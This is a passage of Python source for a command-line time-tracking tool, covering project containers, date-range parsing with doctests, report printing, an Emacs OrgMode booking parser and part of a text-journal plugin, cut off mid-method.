      >>> len(container['abc'])
      2
    """

    # Class-level defaults; Project overrides both.
    intervals = ()
    formatted_name = None

    def __init__(self):
        self._data = {}
        self._name_map = {}

    def keys(self):
        return self._data.keys()

    def fullkeys(self):
        """All project keys in 'a/b/c' path form, recursively."""
        keys = []
        for x in self.projects:
            keys += x.fullkeys()
        return keys

    def __getitem__(self, k):
        # Path-style lookup: 'a/b' descends into sub-projects, creating
        # them on demand.  BUGFIX: u'%s' coercion replaces the Python
        # 2-only unicode() builtin.
        k = (u'%s' % (k or '')).lower()
        prj = self
        items = [x.strip() for x in k.split('/', 1)]
        prj = self._localgetitem(items[0])
        if len(items) > 1:
            return prj[items[1]]
        return prj

    def _localgetitem(self, k):
        # Fetch, or lazily create, the directly-named child project.
        prj = self._data.get(k, None)
        if prj is None:
            prj = Project(k)
            self._data[k] = prj
        return prj

    def __delitem__(self, k):
        # Path-style deletion mirroring __getitem__.
        k = k or ''
        prj = self
        items = k.split('/', 1)
        if len(items) == 1:
            del self._data[items[0]]
        else:
            prj = self._data[items[0]]
            del prj['/'.join(items[1:])]

    def items(self):
        return self._data.items()

    @property
    def projects(self):
        return self._data.values()

    def __len__(self):
        return len(self._data)

    def __str__(self):
        return self._single_str()

    def _single_str(self, padding_count=0):
        # Indented tree rendering used by __str__.
        padding = ' ' * padding_count
        if self.formatted_name:
            s = padding + self.formatted_name + '\n'
        else:
            s = ''
        for key, value in self._data.items():
            s += padding + value._single_str(padding_count + 1)
        return s

    def copy(self, deep=False):
        """Return a copy; deep copies descend into sub-projects."""
        newcontainer = ProjectContainer()
        if deep:
            for key, value in self._data.items():
                newcontainer._data[key] = value.copy(deep)
        return newcontainer

    @property
    def interval_time(self):
        """Total duration of this node's own intervals only."""
        total = datetime.timedelta()
        for x in self.intervals:
            total += x.total
        return total

    @property
    def total_interval_time(self):
        """Total duration including all sub-projects, recursively."""
        total = datetime.timedelta()
        for x in self.intervals:
            total += x.total
        for x in self.projects:
            total += x.total_interval_time
        return total

    def has_intervals(self, deepcheck=False):
        if deepcheck:
            for prj in self.projects:
                if prj.has_intervals(True):
                    return True
        return len(self.intervals) > 0

    @property
    def earliest_interval(self):
        """Interval with the earliest start anywhere in the tree, or
        None when the tree holds no intervals at all."""
        earliest = None
        interval = None
        for x in self.intervals:
            if earliest is None or x.start < earliest:
                earliest = x.start
                interval = x
        for x in self.projects:
            checkinterval = x.earliest_interval
            # BUGFIX: interval-less sub-projects return None; the old
            # code crashed on checkinterval.start in that case.
            if checkinterval is None:
                continue
            if earliest is None or checkinterval.start < earliest:
                earliest = checkinterval.start
                interval = checkinterval
        return interval

    @property
    def latest_interval(self):
        """Interval with the latest start anywhere in the tree, or
        None when the tree holds no intervals at all."""
        latest = None
        interval = None
        for x in self.intervals:
            if latest is None or x.start > latest:
                # BUGFIX: "latest" was never updated here, so the
                # condition stayed true and the loop simply kept the
                # last interval rather than the latest one.
                latest = x.start
                interval = x
        for x in self.projects:
            checkinterval = x.latest_interval
            # BUGFIX: skip interval-less sub-projects (None result).
            if checkinterval is None:
                continue
            if latest is None or checkinterval.start > latest:
                latest = checkinterval.start
                interval = checkinterval
        return interval
class Project(ProjectContainer):
    """A project container that additionally has a name and its own
    (mutable) list of booked intervals."""

    # Instance values assigned in __init__; declared here for clarity.
    intervals = None
    name = None

    def __init__(self, name):
        super(Project, self).__init__()
        self.name = name
        self.intervals = []

    def fullkeys(self):
        """This project's key plus every descendant key in path form."""
        keys = [self.name]
        for child in self.projects:
            keys += [self.name + '/' + childkey
                     for childkey in child.fullkeys()]
        return keys

    def prjkeys_without_intervals(self):
        """Set of descendant keys (path form) carrying no intervals."""
        empty_keys = set()
        for childname, child in self._data.items():
            for suffix in child.prjkeys_without_intervals():
                empty_keys.add(childname + '/' + suffix)
            if not child.has_intervals(True):
                empty_keys.add(childname)
        return empty_keys

    @property
    def formatted_name(self):
        """Name decorated with booked time: "(own -- total)" when the
        project has its own time differing from the subtree total,
        "(total)" when only the total is non-zero, bare name otherwise."""
        own = self.interval_time
        combined = self.total_interval_time
        own_nonzero = (own.days > 0 or own.seconds > 0
                       or own.microseconds > 0)
        combined_nonzero = (combined.days > 0 or combined.seconds > 0
                            or combined.microseconds > 0)
        if own_nonzero and own != combined:
            suffix = u' (%s -- %s)' % (pretty(own), pretty(combined))
        elif combined_nonzero:
            suffix = u' (%s)' % pretty(combined)
        else:
            suffix = ''
        return u'%s%s' % (self.name, suffix)

    def copy(self, deep=False):
        """Copy this project; deep copies descend into sub-projects."""
        duplicate = Project(self.name)
        duplicate.intervals = list(self.intervals)
        if deep:
            for childname, child in self._data.items():
                duplicate._data[childname] = child.copy(deep)
        return duplicate
# Cache of already-resolved parser factories, keyed by dotted name.
parser_factories = {}


def get_parser_factory(name):
    """Resolve a dotted ``package.module.attr`` path to a parser factory.

    Results are cached in ``parser_factories``.  Raises ValueError when
    the module imports fine but lacks the named attribute.
    """
    factory = parser_factories.get(name, None)
    if factory is None:
        lastpos = name.rfind('.')
        # A non-empty fromlist makes __import__ return the leaf module
        # instead of the top-level package.
        parsermod = __import__(name[:lastpos], globals(), locals(), [''])
        try:
            factory = getattr(parsermod, name[lastpos + 1:])
        except AttributeError as e:
            # BUGFIX: "except AttributeError, e" is Python 2-only
            # syntax (a SyntaxError under Python 3); "as e" works on
            # Python 2.6+ and 3.
            raise ValueError('Could not load the factory plugin named %r '
                             '(original message is %r)' % (name, str(e)))
        parser_factories[name] = factory
    return factory
class TimeTracker(object):
    """An instance of this class will maintain state within itself.
    """

    # BUGFIX: parse() always reads self.default_project, but main()
    # only assigns the attribute when the config file defines one;
    # without this class-level default parse() raised AttributeError.
    default_project = None

    def __init__(self):
        self.projects = ProjectContainer()

    def parse(self, filenames, parser_name):
        """In general activitytracker monitors state while parsing. But,
        the parse() function will erase state for current time, current date,
        current note, and current project for every file that is parsed.
        """
        logger.info('Using parser: %s' % parser_name)
        parser = get_parser_factory(parser_name)(self.projects,
                                                 self.default_project)
        # Accept a mix of path strings and nested lists/tuples of paths.
        args = filenames
        filenames = []
        for x in args:
            if isinstance(x, (tuple, list)):
                filenames += list(x)
            else:
                filenames.append(str(x))
        for filename in filenames:
            logger.info("Parsing %r" % filename)
            f = open(filename)
            try:
                parser.parse_input(f)
            finally:
                # Always release the file handle, even if parsing fails.
                f.close()
RE_DATE = re.compile('([0-9][0-9][0-9][0-9])-([0-9][0-9])-([0-9][0-9])')
def first_weekday(d):
    """Determine the first day of the week containing *d*.

    The week start is taken from the calendar module's firstweekday()
    (Monday by default).  Computed arithmetically in O(1) instead of
    stepping back one day at a time.  (Doctest literals also fixed:
    leading-zero ints are invalid in Python 3.)

    >>> from datetime import date
    >>> first_weekday(date(2004, 3, 29))
    datetime.date(2004, 3, 29)
    >>> first_weekday(date(2007, 1, 3))
    datetime.date(2007, 1, 1)
    """
    base = datetime.date(d.year, d.month, d.day)
    # Days since the configured week start, wrapped modulo 7 so any
    # firstweekday() setting (e.g. Sunday) works.
    offset = (calendar.weekday(d.year, d.month, d.day)
              - calendar.firstweekday()) % 7
    return base - datetime.timedelta(days=offset)
def estimate_startstop(datestr, nowfactory=None):
    """While handling user defined text it can be good to estimate the
    intended start and stop datetime's. Requires using YYYY-MM-DD format
    when specifying absolute dates. The nowfactory argument is meant to be
    some callable that will return the time 'right now'.

    >>> estimate_startstop('2007-05-05')
    (datetime.datetime(2007, 5, 5, 0, 0),
     datetime.datetime(2007, 5, 5, 23, 59))
    >>> estimate_startstop('2007-05-05:2007-07-07')
    (datetime.datetime(2007, 5, 5, 0, 0),
     datetime.datetime(2007, 7, 7, 23, 59))

    Make sure english month name matching works.

    >>> startstop = estimate_startstop('march')
    >>> (startstop[0].month, startstop[1].month)
    (3, 3)
    >>> startstop = estimate_startstop('nov')
    >>> (startstop[0].month, startstop[1].month)
    (11, 11)

    And english week day names.

    >>> from calendar import weekday
    >>> startstop = estimate_startstop('tuesday')
    >>> weekday(startstop[0].year, startstop[0].month, startstop[0].day)
    1
    >>> startstop = estimate_startstop('fri')
    >>> weekday(startstop[0].year, startstop[0].month, startstop[0].day)
    4

    >>> from datetime import datetime
    >>> def nowfactory(): return datetime(2006, 5, 7, 15, 23)
    >>> estimate_startstop('today', nowfactory)
    (datetime.datetime(2006, 5, 7, 0, 0),
     datetime.datetime(2006, 5, 7, 23, 59))
    >>> estimate_startstop('yesterday', nowfactory)
    (datetime.datetime(2006, 5, 6, 0, 0),
     datetime.datetime(2006, 5, 6, 23, 59))
    >>> estimate_startstop('week', nowfactory)
    (datetime.datetime(2006, 5, 1, 0, 0),
     datetime.datetime(2006, 5, 7, 23, 59))
    >>> estimate_startstop('lastweek', nowfactory)
    (datetime.datetime(2006, 4, 24, 0, 0),
     datetime.datetime(2006, 4, 30, 23, 59, 59))
    >>> estimate_startstop('1', nowfactory)
    (datetime.datetime(1, 1, 1, 0, 0),
     datetime.datetime(1, 12, 31, 23, 59))
    >>> estimate_startstop('apr', nowfactory)
    (datetime.datetime(2006, 4, 1, 0, 0),
     datetime.datetime(2006, 4, 30, 23, 59))
    >>> estimate_startstop('2006-04', nowfactory)
    (datetime.datetime(2006, 4, 1, 0, 0),
     datetime.datetime(2006, 4, 30, 23, 59))
    >>> estimate_startstop('2000:2004', nowfactory)
    (datetime.datetime(2000, 1, 1, 0, 0),
     datetime.datetime(2004, 12, 31, 23, 59))
    """
    if not datestr:
        raise ValueError('datestr cannot be empty')
    if nowfactory is None:
        nowfactory = datetime.datetime.now

    def handle_one(onedatestr):
        # Map one date word/value to a (start, stop) datetime pair.
        if onedatestr == 'all':
            start = None
            stop = None
        elif onedatestr == 'today':
            start = nowfactory()
            start = datetime.datetime(start.year, start.month, start.day)
            stop = datetime.datetime(start.year, start.month,
                                     start.day, 23, 59)
        elif onedatestr == 'yesterday':
            start = nowfactory() - ONE_DAY
            start = datetime.datetime(start.year, start.month, start.day)
            stop = datetime.datetime(start.year, start.month,
                                     start.day, 23, 59)
        elif onedatestr == 'lastweek':
            start = nowfactory()
            start = datetime.datetime(start.year, start.month, start.day)
            start = first_weekday(start)
            start = datetime.datetime(start.year, start.month, start.day) \
                - datetime.timedelta(days=7)
            stop = start + datetime.timedelta(days=6,
                                              minutes=1439, seconds=59)
        elif onedatestr == 'week':
            start = nowfactory()
            start = datetime.datetime(start.year, start.month, start.day)
            stop = datetime.datetime(start.year, start.month,
                                     start.day, 23, 59)
            start = first_weekday(start)
            start = datetime.datetime(start.year, start.month, start.day)
        elif onedatestr == 'month':
            start = nowfactory()
            start = datetime.datetime(start.year, start.month, 1)
            stop = last_monthday(start)
            stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
        elif onedatestr == 'year':
            start = nowfactory()
            start = datetime.datetime(start.year, 1, 1)
            stop = nowfactory()
            stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
        else:
            if RE_DATE.match(onedatestr) is not None:
                # Exact YYYY-MM-DD day.
                start = datetime.datetime(*time.strptime(onedatestr,
                                                         '%Y-%m-%d')[:3])
                stop = datetime.datetime(start.year, start.month,
                                         start.day, 23, 59)
            else:
                vals = onedatestr.split('-')
                if len(vals) == 1 and vals[0].isdigit():
                    # Bare year: span the whole year.
                    year = int(vals[0])
                    start = datetime.datetime(year, 1, 1)
                    days = 364
                    if calendar.isleap(year):
                        days = 365
                    stop = start + datetime.timedelta(days=days,
                                                      minutes=60 * 23 + 59)
                elif len(vals) == 2 and vals[0].isdigit() \
                        and vals[1].isdigit():
                    # YYYY-MM: span that month.  BUGFIX: this branch
                    # used the year-length span above, so "2006-04"
                    # stretched to roughly 2007-03-31; clamp to the
                    # month like the english-month branch below.
                    year = int(vals[0])
                    month = int(vals[1])
                    start = datetime.datetime(year, month, 1)
                    stop = last_monthday(start)
                    stop = datetime.datetime(stop.year, stop.month,
                                             stop.day, 23, 59)
                else:
                    # do some word checks for months
                    start = None
                    for pos, month in enumerate(MONTH_NAMES):
                        if month is not None and month.startswith(onedatestr):
                            month_index = pos
                            start = nowfactory()
                            start = datetime.datetime(start.year,
                                                      month_index, 1)
                            stop = last_monthday(start)
                            stop = datetime.datetime(stop.year, stop.month,
                                                     stop.day, 23, 59)
                            break
                    if start is None:
                        # And finally weekday words: most recent such day.
                        for pos, weekday in enumerate(WEEKDAY_NAMES):
                            if weekday.startswith(onedatestr):
                                start = nowfactory()
                                while calendar.weekday(start.year, start.month,
                                                       start.day) != pos:
                                    start -= ONE_DAY
                                start = datetime.datetime(start.year,
                                                          start.month,
                                                          start.day,
                                                          0, 0)
                                stop = datetime.datetime(start.year,
                                                         start.month,
                                                         start.day,
                                                         23, 59)
                                break
                    if start is None:
                        raise ValueError("Couldn't derive a date value from %r"
                                         % onedatestr)
        return start, stop

    args = datestr.split(':')
    if len(args) > 2:
        raise ValueError('Can only handle two date values')
    start, end = handle_one(args[0])
    if len(args) > 1:
        # "a:b" -- the second value only contributes its stop datetime.
        ignorestart, end = handle_one(args[1])
    return (start, end)
class TrackerReporter(object):
    """A helper class for formatting reports on a given tracker.
    """

    def __init__(self, tracker):
        self.tracker = tracker

    def _remove_invalid(self, container, date_start, date_end,
                        project_filter):
        # Prune, in place and recursively, every interval falling
        # outside the [date_start, date_end] window.
        # NOTE(review): date_start/date_end may be None (the 'all'
        # filter); under Python 3 these comparisons would then raise
        # TypeError -- confirm intended inputs.
        for prj in container.projects:
            intervals = []
            for x in prj.intervals:
                if x.start >= date_start and x.stop <= date_end:
                    intervals.append(x)
            prj.intervals = intervals
            self._remove_invalid(prj, date_start, date_end, project_filter)

    def filtered_results(self, date_start=None, date_end=None,
                         project_filter=[]):
        # Deep-copy the tracker's projects, restrict to the date window,
        # drop projects left without intervals, then apply the
        # substring-based project filter.  (project_filter is never
        # mutated, so the mutable default is harmless here.)
        container = self.tracker.projects.copy(True)
        self._remove_invalid(container, date_start, date_end, project_filter)
        empty = set()
        for name, prj in container.items():
            for key in prj.prjkeys_without_intervals():
                empty.add(name + '/' + key)
            if not prj.has_intervals(True):
                empty.add(name)
        # Reverse-sorted so children are deleted before their parents.
        for key in reversed(sorted(empty)):
            del container[key]
        if project_filter:
            # Keep only keys containing one of the filter substrings.
            newcontainer = ProjectContainer()
            for key in container.fullkeys():
                for prj in project_filter:
                    if key.find(prj) > -1:
                        newprj = newcontainer[key]
                        newprj.intervals = container[key].intervals
            container = newcontainer
        return container

    def build_by_date(self, datedict, root, container=None, ancestors=[]):
        # Regroup intervals by calendar position: fills datedict with
        # {(year, month): {date: ProjectContainer}} keyed by each
        # interval's start date.  (ancestors is only read and copied,
        # never mutated, so the mutable default is harmless.)
        if container is None:
            container = root
        ancestorkey = '/'.join(ancestors)
        if ancestorkey:
            ancestorkey += '/'
        for prj in container.projects:
            for interval in prj.intervals:
                d = interval.start.date()
                month = datedict.get((d.year, d.month), None)
                if month is None:
                    month = {}
                    datedict[(d.year, d.month)] = month
                existing = month.get(d, None)
                if existing is None:
                    existing = ProjectContainer()
                    month[d] = existing
                existing[ancestorkey + prj.name].intervals.append(interval)
            newancestors = ancestors + [prj.name]
            self.build_by_date(datedict, root, prj, newancestors)

    def print_results(self,
                      date_start=None,
                      date_end=None,
                      display_intervals=False,
                      display_notes=False,
                      project_filter=[]):
        # Print the full report via the module-level out() helper: a
        # month/day breakdown followed by per-project totals.
        if date_start is not None or date_end is not None or project_filter:
            container = self.filtered_results(date_start, date_end,
                                              project_filter)
        else:
            container = self.tracker.projects
        out()
        out("Filter: %s --- %s" % (pretty(date_start), pretty(date_end)))
        # NOTE(review): earliest/latest are computed here but never
        # printed -- likely leftovers from a removed summary line.
        earliest = container.earliest_interval
        if earliest is not None:
            earliest = pretty(earliest.start)
        else:
            earliest = 'N/A'
        latest = container.latest_interval
        if latest is not None:
            latest = pretty(latest.start)
        else:
            latest = 'N/A'
        out()
        total = pretty(container.total_interval_time)
        out('Months (%s):' % total)
        d = {}
        self.build_by_date(d, container)
        for smonth in sorted(d.keys()):
            month = d[smonth]
            month_total = datetime.timedelta()
            for c in month.values():
                month_total += c.total_interval_time
            out('%i, %s (%s)' % (smonth[0], MONTHS[smonth[1]].title(),
                                 pretty(month_total)),
                ' ')
            for day in sorted(month.keys()):
                c = month[day]
                out('%s (%s)' % (pretty(day),
                                 pretty(c.total_interval_time)),
                    ' ')
                self.print_container(c, ' ', display_intervals,
                                     display_notes)
        out()
        out('Totals (%s):' % total)
        for prj_name in sorted(container.keys()):
            prj = container[prj_name]
            self.print_container(container=prj, padding=' ')
        out()

    def print_container(self,
                        container,
                        padding='',
                        display_intervals=False,
                        display_notes=False):
        # Recursively print one project subtree, optionally including
        # each interval and its note lines.
        if container.formatted_name:
            out(container.formatted_name, padding)
        if display_intervals:
            for interval in container.intervals:
                out('%s to %s (%s)' % (pretty(interval.start.time()),
                                       pretty(interval.stop.time()),
                                       pretty(interval.total)),
                    padding + ' ')
                if display_notes:
                    p = padding + ' '
                    for x in interval.note.splitlines():
                        out(x, p)
        for key in sorted(container._data.keys()):
            value = container._data[key]
            self.print_container(value, padding + ' ',
                                 display_intervals,
                                 display_notes)
def parse_reporter_kwargs(opts):
    """Translate parsed command-line options into the keyword arguments
    expected by TrackerReporter.print_results()."""
    kwargs = {}
    if opts.date_filter is not None:
        start, stop = estimate_startstop(opts.date_filter)
    else:
        # Default window: the current week.
        start, stop = estimate_startstop('week')
    # BUGFIX: ''.split(',') yields [''], which print_results treated as
    # an active filter matching every key (''.find matches anything) --
    # drop empty/blank entries so no --project-filter means no filter.
    project_filter = [x.strip() for x in opts.project_filter.split(',')
                      if x.strip()]
    kwargs.update(date_start=start,
                  date_end=stop,
                  display_intervals=opts.display_intervals,
                  display_notes=opts.display_notes,
                  project_filter=project_filter)
    return kwargs
def main():
    """Command-line entry point: parse options, load config.ini, feed
    every configured file group to a TimeTracker and print the report."""
    import os
    import optparse
    import ConfigParser

    parser = optparse.OptionParser()
    parser.add_option('--date-filter', dest='date_filter',
                      help='Date range for bookings to watch for, dates '
                           'must be in YYYY-MM-DD format and can be one '
                           'date or start_date:stop_date. Values such as '
                           '"all", "week", "today", or "yesterday" are '
                           'also valid. In addition, it is possible to '
                           'specify an english month word or abbreviation of '
                           'an english month word... the year will '
                           'be assumed to be the current year. Default date '
                           'filter is "week" which list all entries so far '
                           'this current week starting with Monday')
    parser.add_option('-i', '--display-intervals',
                      action='store_true',
                      default=False,
                      dest='display_intervals',
                      help='Show all bookings')
    parser.add_option('-n', '--display-notes',
                      action='store_true',
                      default=False,
                      dest='display_notes',
                      help='Show all interval notes, only works in '
                           'combination with -i')
    parser.add_option('--project-filter', dest='project_filter',
                      default='',
                      help='Comma-separated list of projects')
    parser.add_option('-d', '--debug', dest='debug',
                      action='store_true',
                      default=False,
                      help='Show debugging output')
    (opts, args) = parser.parse_args()

    if opts.debug:
        logging.basicConfig(level=logging.DEBUG)
    else:
        logging.basicConfig(level=logging.WARNING)

    configfilename = find_config_file('config.ini')
    config = None
    if not configfilename:
        # NOTE(review): configfilename is None on this branch, so the
        # warning always prints "None" -- it probably meant to list the
        # searched locations instead.
        logger.warn("Couldn't open file %r" % configfilename)
    else:
        logger.info('Loading config file: %r' % configfilename)
        config = ConfigParser.ConfigParser()
        config.read(configfilename)

    tracker = TimeTracker()
    # Optional [General] default_project, normalized to "a/b" form.
    if config is not None and \
            config.has_option('General', 'default_project') and \
            config.get('General', 'default_project').strip():
        prj = config.get('General', 'default_project')
        prj = '/'.join([x.strip() for x in prj.split('/')
                        if x.strip()])
        tracker.default_project = prj

    # With no file arguments, gather files from every "File Group"
    # section in the config.
    if len(args) == 0 and config is not None:
        for section in config.sections():
            if section == 'File Group' or section.startswith('File Group:'):
                logger.info('Handling file group %r' % section)
                args = []
                base_dir = config.get(section, 'base_dir')
                r = re.compile(config.get(section, 'filename_match'))
                for x in os.listdir(base_dir):
                    if r.match(x) is not None:
                        args.append(os.path.join(base_dir, x))
                kwargs = {}
                if config.has_option(section, 'parser_name'):
                    kwargs['parser_name'] = config.get(section, 'parser_name')
                # NOTE(review): parse() requires parser_name, so a file
                # group section without one raises TypeError here.
                tracker.parse(args, **kwargs)

    reporter = TrackerReporter(tracker)
    reporter.print_results(**parse_reporter_kwargs(opts))


if __name__ == '__main__':
    main()
from activitytracker import base
import datetime
import re
class EmacsOrgModeParser(base.AbstractFileParser):
    """A parser that understands OrgMode-formatted text files. Any
    heading marked with a "book" tag and a timestamp as the next
    line will be treated as a time interval.
    """

    # "** Heading text" -- group 1 is the stars, group 2 the title.
    heading_re = re.compile('([*]+)(.*)')
    # Trailing ":tag1:tag2:" list on a heading line.
    tags_re = re.compile('(.*):([a-zA-Z0-9]+):')
    # "<YYYY-MM-DD Day HH:MM(-HH:MM)?>"; groups 7/8 hold the optional
    # end time.
    date_re = re.compile('<([0-9]+)-([0-9]+)-([0-9]+) [a-zA-Z]* '
                         '([0-9]+):([0-9]+)(-([0-9]+):([0-9]+))?>')

    def parse_input(self, input):
        """Collect "book"-tagged headings and hand each one, with the
        lines following it, to handle()."""
        task = None
        extra = []
        for line in input:
            line = line.rstrip()
            headingmatch = self.heading_re.match(line)
            if not headingmatch:
                extra.append(line)
                continue
            heading = headingmatch.group(2).strip()
            tags = []
            tagsmatch = self.tags_re.match(heading)
            if tagsmatch:
                heading = tagsmatch.group(1).strip()
                tags = [x for x in tagsmatch.group(2).split(':') if x.strip()]
            if 'book' in tags:
                # New booked heading: flush the previous one first.
                if task:
                    self.handle(task, extra)
                task = heading
                extra = []
            else:
                extra.append(line)
        # Flush the final heading at end of input.
        if task:
            self.handle(task, extra)

    def handle(self, task, extra):
        """Record one booked heading: extra[0] must be the timestamp
        line; the remaining non-blank lines become the interval note."""
        m = self.date_re.match(extra[0])
        if not m:
            return
        start = datetime.datetime(int(m.group(1)), int(m.group(2)),
                                  int(m.group(3)), int(m.group(4)),
                                  int(m.group(5)))
        if m.group(7) is None:
            # No explicit end time: assume the hour following the start
            # (minutes zeroed, matching the original convention).
            # BUGFIX: the old "hour + 1" arithmetic produced hour 24 --
            # a datetime ValueError -- for bookings starting at 23:xx;
            # timedelta arithmetic rolls over to the next day instead.
            stop = start.replace(minute=0) + datetime.timedelta(hours=1)
        else:
            stop = datetime.datetime(int(m.group(1)), int(m.group(2)),
                                     int(m.group(3)), int(m.group(7)),
                                     int(m.group(8)))
        task = '/'.join([x.strip() for x in task.split('/') if x.strip()])
        note = '\n'.join([x for x in extra[1:] if x.strip()])
        interval = base.Interval(start, stop, note)
        self.projects[task].intervals.append(interval)
import calendar
import csv
import datetime
import os
import re
import sys
import time
from activitytracker.base import (AbstractFileParser, Interval,
find_config_file)
# Load user configuration for the text plugin.  The config file is plain
# Python executed into `namespace`; it is expected to define BASEDIR,
# CLIENT_MAPPINGS, FANCY_CLIENT_MAPPINGS and ACTION_MAPPINGS.
namespace = {}
configfilename = find_config_file('textconfig')
if configfilename:
    execfile(configfilename, namespace)
# NOTE(review): if no config file was found, the lookups below raise
# KeyError -- presumably the plugin is unusable without configuration;
# confirm whether a friendlier error is wanted.
BASEDIR = namespace['BASEDIR']
CLIENT_MAPPINGS = namespace['CLIENT_MAPPINGS']
FANCY_CLIENT_MAPPINGS = namespace['FANCY_CLIENT_MAPPINGS']
ACTION_MAPPINGS = namespace['ACTION_MAPPINGS']
# Pre-compile each action's pattern strings (case-insensitive), replacing
# the string lists in ACTION_MAPPINGS with compiled regexes in place.
for action in ACTION_MAPPINGS.keys():
    exprs = ACTION_MAPPINGS[action]
    regexes = []
    for expr in exprs:
        regexes.append(re.compile(expr, re.IGNORECASE))
    ACTION_MAPPINGS[action] = regexes
# Journal file names look like "month-January-2010.txt".
RE_JOURNAL_FILE = re.compile('^month-([a-zA-Z]*)-([0-9]*).txt$')
# Day header line, e.g. "Day: January 5, 2010".
RE_DAY_BEGINS = re.compile('[dD][aA][yY]: *([a-zA-Z]*) *([0-9][0-9]?) *'
                           ', *([0-9][0-9][0-9][0-9]).*')
# A clock time anywhere in a line / a line that is nothing but a clock time.
RE_TIME = re.compile('([0-9][0-9]?):([0-9][0-9]?)([ap]m)? *')
RE_ONLY_TIME = re.compile('^([0-9][0-9]?):([0-9][0-9]?)([ap]m)? *$')
# Trailing running-total annotations such as ": 3hr" on a project name.
RE_TRAILING_HOURS = re.compile(': *[0-9]*hr')
# "stopped at 5:30pm"-style end-of-work markers.
RE_STOPPED = re.compile(' +stopped +[a-zA-Z ]*([0-9][0-9]?):([0-9][0-9]?)'
                        '([ap]m)? *')
# Comment markers that flag a booking as non-billable.
RE_NOT_BILLABLE = re.compile(' *not? *bill(able)?')
# ISO-style dates: YYYY-MM-DD.
RE_DATE = re.compile('([0-9][0-9][0-9][0-9])-([0-9][0-9])-([0-9][0-9])')
# Index 0 is None so list positions line up with month numbers 1-12.
MONTHS = [None, 'january', 'february', 'march', 'april', 'may', 'june', 'july',
          'august', 'september', 'october', 'november', 'december']
# Parser states: STATE_JUST_READ_TIME means the previous line was a bare
# clock time, so the next line may name a client/project.
STATE_NONE = 0
STATE_JUST_READ_TIME = 1
ONE_DAY = datetime.timedelta(days=1)
class Client(object):
    """A billable client owning a collection of named projects."""

    def __init__(self, name):
        self.name = name
        # Every client starts out with a catch-all project for bookings
        # that were never assigned to a specific project.
        self.projects = {'NO PROJECT': Project('NO PROJECT')}

    def clone(self):
        """Return a copy of this client; the project mapping is shared,
        not copied (callers typically replace it wholesale)."""
        duplicate = Client(self.name)
        duplicate.projects = self.projects
        return duplicate

    @property
    def bookings(self):
        """All bookings across every project, merged into one container."""
        merged = BookingContainer()
        for prj in self.projects.values():
            merged += prj.bookings
        return merged
class Project(object):
    """A named project accumulating time bookings."""

    def __init__(self, name):
        self.name = name
        self.bookings = BookingContainer()

    def clone(self):
        """Return a copy with independently cloned bookings."""
        duplicate = Project(self.name)
        duplicate.bookings = self.bookings.clone()
        return duplicate
class Booking(object):
    """A single contiguous span of tracked time with an optional comment."""

    def __init__(self, start, stop, comment=''):
        self.start = start
        self.stop = stop
        self.comment = comment

    @property
    def time(self):
        """Duration of this booking as a timedelta."""
        return self.stop - self.start

    def clone(self):
        """Return an independent copy of this booking."""
        return Booking(self.start, self.stop, self.comment)

    @property
    def billable(self):
        """False when the comment carries a "not billable" marker."""
        return not RE_NOT_BILLABLE.search(self.comment)
class BookingContainer(list):
    """A list of Booking objects that keeps running time totals.

    Totals are maintained incrementally as bookings are added; removal
    operations (pop, remove, slicing) are not tracked.
    """

    def __init__(self, initlist=None):
        self.__total_time = datetime.timedelta()
        self.__total_billable_time = datetime.timedelta()
        if initlist is None:
            super(BookingContainer, self).__init__()
        else:
            super(BookingContainer, self).__init__(initlist)
            for booking in initlist:
                self._add_time(booking)

    def _add_time(self, booking):
        """Fold one booking's duration into the running totals."""
        self.__total_time += booking.time
        if booking.billable:
            self.__total_billable_time += booking.time

    @property
    def total_time(self):
        """Sum of all bookings' durations."""
        return self.__total_time

    @property
    def total_billable_time(self):
        """Sum of durations of billable bookings only."""
        return self.__total_billable_time

    def append(self, x):
        if not isinstance(x, Booking):
            raise TypeError('object is not of type "Booking"')
        self._add_time(x)
        return list.append(self, x)

    def insert(self, index, x):
        self._add_time(x)
        return list.insert(self, index, x)

    def __iadd__(self, other):
        for booking in other:
            self._add_time(booking)
        return list.__iadd__(self, other)

    def clone(self):
        """Return a container holding clones of every booking."""
        return BookingContainer([booking.clone() for booking in self])
def fancy_datetime(d):
    """Render a date/datetime/time like 'January 02, 2020 (Thursday) at 9:05am'.

    datetimes get date and time, dates only the date, times only the
    clock part.  Any other type falls through and returns None.
    """
    clock = d.strftime('%I:%M%p').lower()
    if clock.startswith('0'):
        clock = clock[1:]
    if isinstance(d, datetime.datetime):
        return d.strftime('%B %d, %Y (%A)') + ' at ' + clock
    if isinstance(d, datetime.date):
        return d.strftime('%B %d, %Y (%A)')
    if isinstance(d, datetime.time):
        return clock
def last_monthday(dt):
    """Return dt shifted to the final day of its month.

    Works for both date and datetime; any time-of-day component is
    preserved.
    """
    final_day = calendar.monthrange(dt.year, dt.month)[1]
    return dt.replace(day=final_day)
def fancy_booking_totals(bookings):
    """Format total hours, flagging any non-billable portion with '*'."""
    total = bookings.total_time
    nonbillable = total - bookings.total_billable_time
    suffix = ''
    if nonbillable:
        suffix = ' [%s *]' % fancy_time_amount(nonbillable)
    return '%s%s' % (fancy_time_amount(total), suffix)
def fancy_time_amount(total):
    """Render a timedelta as decimal hours, e.g. '2.5 hrs'.

    NOTE(review): microseconds are ignored, so sub-second amounts vanish.
    """
    hours = total.days * 24.0 + total.seconds / 3600.0
    return '{0} hrs'.format(hours)
def first_weekday(d):
    """Walk backwards from d to the calendar module's first weekday
    (Monday unless calendar.setfirstweekday was called)."""
    day = d
    step = datetime.timedelta(days=1)
    while calendar.weekday(day.year, day.month, day.day) != \
            calendar.firstweekday():
        day -= step
    return day
class Processor(object):
    """Stateful line-oriented parser for monthly journal text files.

    Consumes journal lines (process_input) and accumulates Client /
    Project / Booking objects plus per-day "action" notes matched by
    ACTION_MAPPINGS.  show_results() renders the accumulated data.

    Fixes relative to the previous revision:
      * show_results wrote booking comment lines to sys.stdout instead
        of the supplied `out` stream;
      * the "Latest: N/A" guard tested filtered.earliest rather than
        filtered.latest.
    """

    def __init__(self):
        self.state = STATE_NONE
        self.clients = {}            # client name -> Client
        self.current_date = None     # date of the journal day being parsed
        self.actions = {}            # date -> {action name: [matching lines]}
        self.first_day = None        # earliest journal day seen
        self.last_day = None         # latest journal day seen
        self.last_comments = []      # comment lines for the pending booking

    def _start_day(self, date):
        """Close out any booking left open on the previous day and reset
        the per-day parsing state for `date`."""
        if getattr(self, 'start_time', None) is not None \
           and getattr(self, 'last_funny_datetime', None) is not None:
            start = datetime.datetime.combine(self.current_date,
